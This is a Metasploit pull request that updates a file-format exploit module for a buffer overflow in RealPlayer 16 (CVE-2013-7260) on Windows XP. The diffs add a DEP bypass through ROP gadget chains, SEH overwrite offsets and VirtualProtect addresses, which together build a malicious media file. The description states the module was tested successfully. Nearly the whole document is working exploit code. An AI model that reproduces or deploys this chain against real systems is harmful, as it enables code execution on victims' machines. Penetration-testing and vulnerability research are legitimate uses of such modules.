### PR TITLE
Update realplayer_ver_attribute_bof.rb

### DIFF
--- a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
+++ b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
@@ -54,7 +54,6 @@ class Metasploit3 < Msf::Exploit::Remote
             {
               'OffsetROP'  => 44,
               'OffsetMenu' => 11052,      # Open via File -> Open
-              'VP'         => 0x7c801ad4, # VirtualProtect() [kernel32.dll]
               'Ret'        => 0x5acceecd  # ADD ESP,428 # RETN 10 [mswmdm.dll]
             }
           ],
@@ -62,7 +61,6 @@ class Metasploit3 < Msf::Exploit::Remote
             {
               'OffsetROP'  => 44,
               'OffsetMenu' => 11052,      # Open via File -> Open
-              'VP'         => 0x7c801ad0, # VirtualProtect() [kernel32.dll]
               'Ret'        => 0x5acceecd  # ADD ESP,428 # RETN 10 [mswmdm.dll]
             }
           ]
@@ -88,22 +86,22 @@ class Metasploit3 < Msf::Exploit::Remote
 
     rop_gadgets =
     [
-      0x77c21d16,    # POP EAX # RETN [msvcrt.dll]
-      target['VP'],  # ptr to &VirtualProtect() [kernel32.dll]
-      0x64d6c976,    # XCHG EAX,ESI # RETN [rjbc3260.dll]
-      0x77c1bb36,    # POP EBP # RETN [msvcrt.dll]
-      0x6f650dc3,    # JMP ESP [cewmdm.dll]
-      0x77c2362c,    # POP EBX # RETN [msvcrt.dll]
-      0x0000095c,    # 0x0000095C-> EBC
-      0x5acb2caf,    # POP EDX # RETN [mswmdm.dll]
-      0x00000040,    # 0x00000040-> EDX
-      0x77c1f519,    # POP ECX # RETN [msvcrt.dll]
-      0x77C5D305,    # &Writable location [msvcrt.dll]
-      0x77c23b47,    # POP EDI # RETN [msvcrt.dll]
-      0x77c1c552,    # RETN (ROP NOP) [msvcrt.dll]
-      0x77c21d16,    # POP EAX # RETN [msvcrt.dll]
-      0x90909090,    # NOP
-      0x77c12df9     # PUSHAD # RETN [msvcrt.dll]
+      0x77c21d16,  # POP EAX # RETN [msvcrt.dll]
+      0x77c11120,  # ptr to &VirtualProtect() [IAT msvcrt.dll]
+      0x77c1bb36,  # POP EBP # RETN [msvcrt.dll]
+      0x77c20497,  # skip 4 bytes [msvcrt.dll]
+      0x77c2362c,  # POP EBX # RETN [msvcrt.dll]
+      0x0000095c,  # 0x0000095C-> EBC
+      0x5acb2caf,  # POP EDX # RETN [mswmdm.dll]
+      0x00000040,  # 0x00000040-> EDX
+      0x77c1f519,  # POP ECX # RETN [msvcrt.dll]
+      0x77C5D305,  # &Writable location [msvcrt.dll]
+      0x77c23b47,  # POP EDI # RETN [msvcrt.dll]
+      0x77c47a42,  # RETN (ROP NOP) [msvcrt.dll]
+      0x77c2ed13,  # POP ESI # RETN [msvcrt.dll]
+      0x77c2aacc,  # JMP [EAX] [msvcrt.dll]
+      0x77c12df9,  # PUSHAD # RETN [msvcrt.dll]
+      0x77c35459,  # PUSH ESP # RET [msvcrt.dll]
     ].flatten.pack('V*')
 
     sploit =  rand_text_alpha_upper(target['OffsetROP'])

--- a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
+++ b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
@@ -31,7 +31,11 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'References'     =>
         [
+          [ 'BID', '64695' ],
+          [ 'EDB', '30468' ],
+          [ 'OSVDB', '101356' ],
           [ 'CVE', '2013-7260' ],
+          [ 'US-CERT-VU', '698278' ],
           [ 'URL', 'http://service.real.com/realplayer/security/12202013_player/en/' ]
         ],
       'DefaultOptions' =>

--- a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
+++ b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'References'     =>
         [
-          [ 'CVE', '2013-6877' ],
+          [ 'CVE', '2013-7260' ],
           [ 'URL', 'http://service.real.com/realplayer/security/12202013_player/en/' ]
         ],
       'DefaultOptions' =>

--- a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
+++ b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
@@ -50,20 +50,13 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'Targets'       =>
         [
-          [ 'Windows XP SP3 (DEP Bypass) / RealPlayer 16.0.3.51/16.0.2.32',
+          [ 'Windows XP SP2/SP3 (DEP Bypass) / RealPlayer 16.0.3.51/16.0.2.32',
             {
               'OffsetROP'  => 44,
               'OffsetMenu' => 11052,      # Open via File -> Open
               'Ret'        => 0x5acceecd  # ADD ESP,428 # RETN 10 [mswmdm.dll]
             }
           ],
-          [ 'Windows XP SP2 (DEP Bypass) / RealPlayer 16.0.3.51/16.0.2.32',
-            {
-              'OffsetROP'  => 44,
-              'OffsetMenu' => 11052,      # Open via File -> Open
-              'Ret'        => 0x5acceecd  # ADD ESP,428 # RETN 10 [mswmdm.dll]
-            }
-          ]
         ],
       'Privileged'     => false,
       'DisclosureDate' => 'Dec 20 2013',

--- a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
+++ b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
@@ -46,22 +46,24 @@ class Metasploit3 < Msf::Exploit::Remote
       'Payload'        =>
         {
           'BadChars'  => "\x00\x22",
-          'Space'     => 532,
+          'Space'     => 2396,
         },
       'Targets'       =>
         [
-          [ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.3.51',
+          [ 'Windows XP SP3 (DEP Bypass) / RealPlayer 16.0.3.51/16.0.2.32',
             {
-              'OffsetClick' => 2540,       # Open via double click
-              'OffsetMenu'  => 13600,      # Open via File -> Open
-              'Ret'         => 0x641930C8  # POP POP RET from rpap3260.dll
+              'OffsetROP'  => 44,
+              'OffsetMenu' => 11052,      # Open via File -> Open
+              'VP'         => 0x7c801ad4, # VirtualProtect() [kernel32.dll]
+              'Ret'        => 0x5acceecd  # ADD ESP,428 # RETN 10 [mswmdm.dll]
             }
           ],
-          [ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.2.32',
+          [ 'Windows XP SP2 (DEP Bypass) / RealPlayer 16.0.3.51/16.0.2.32',
             {
-              'OffsetClick' => 2540,       # Open via double click
-              'OffsetMenu'  => 13600,      # Open via File -> Open
-              'Ret'         => 0x63A630B8  # POP POP RET from rpap3260.dll
+              'OffsetROP'  => 44,
+              'OffsetMenu' => 11052,      # Open via File -> Open
+              'VP'         => 0x7c801ad0, # VirtualProtect() [kernel32.dll]
+              'Ret'        => 0x5acceecd  # ADD ESP,428 # RETN 10 [mswmdm.dll]
             }
           ]
         ],
@@ -79,10 +81,40 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def exploit
 
-    sploit =  rand_text_alpha_upper(target['OffsetClick'])
-    sploit << generate_seh_payload(target.ret)
-    sploit << rand_text_alpha_upper(target['OffsetMenu'] - sploit.length)
-    sploit << generate_seh_payload(target.ret)
+    rop_nop =
+    [
+      0x77c1c552     # RETN (ROP NOP) [msvcrt.dll]
+    ].flatten.pack('V*')
+
+    rop_gadgets =
+    [
+      0x77c21d16,    # POP EAX # RETN [msvcrt.dll]
+      target['VP'],  # ptr to &VirtualProtect() [kernel32.dll]
+      0x64d6c976,    # XCHG EAX,ESI # RETN [rjbc3260.dll]
+      0x77c1bb36,    # POP EBP # RETN [msvcrt.dll]
+      0x6f650dc3,    # JMP ESP [cewmdm.dll]
+      0x77c2362c,    # POP EBX # RETN [msvcrt.dll]
+      0x0000095c,    # 0x0000095C-> EBC
+      0x5acb2caf,    # POP EDX # RETN [mswmdm.dll]
+      0x00000040,    # 0x00000040-> EDX
+      0x77c1f519,    # POP ECX # RETN [msvcrt.dll]
+      0x77C5D305,    # &Writable location [msvcrt.dll]
+      0x77c23b47,    # POP EDI # RETN [msvcrt.dll]
+      0x77c1c552,    # RETN (ROP NOP) [msvcrt.dll]
+      0x77c21d16,    # POP EAX # RETN [msvcrt.dll]
+      0x90909090,    # NOP
+      0x77c12df9     # PUSHAD # RETN [msvcrt.dll]
+    ].flatten.pack('V*')
+
+    sploit =  rand_text_alpha_upper(target['OffsetROP'])
+    sploit << rop_nop
+    sploit << make_nops(16)
+    sploit << rop_gadgets
+    sploit << make_nops(16)
+    sploit << payload.encoded
+    sploit << generate_seh_record(target.ret) # Open via double click (2540)
+    sploit << rand_text_alpha_upper(target['OffsetMenu'])
+    sploit << generate_seh_record(target.ret) # Open via File -> Open (13600)
     sploit << rand_text_alpha_upper(17000) # Generate exception
 
     # Create the file


### PR DESCRIPTION
Since a new CVE has been issued for this vulnerability I have corrected the CVE identifier and added some other references.

I have also added DEP bypass support. The module has been tested successfully on Windows XP SP2/SP3 EN with DEP in OptIn and OptOut mode ("Turn on DEP for all programs and services except those I select").
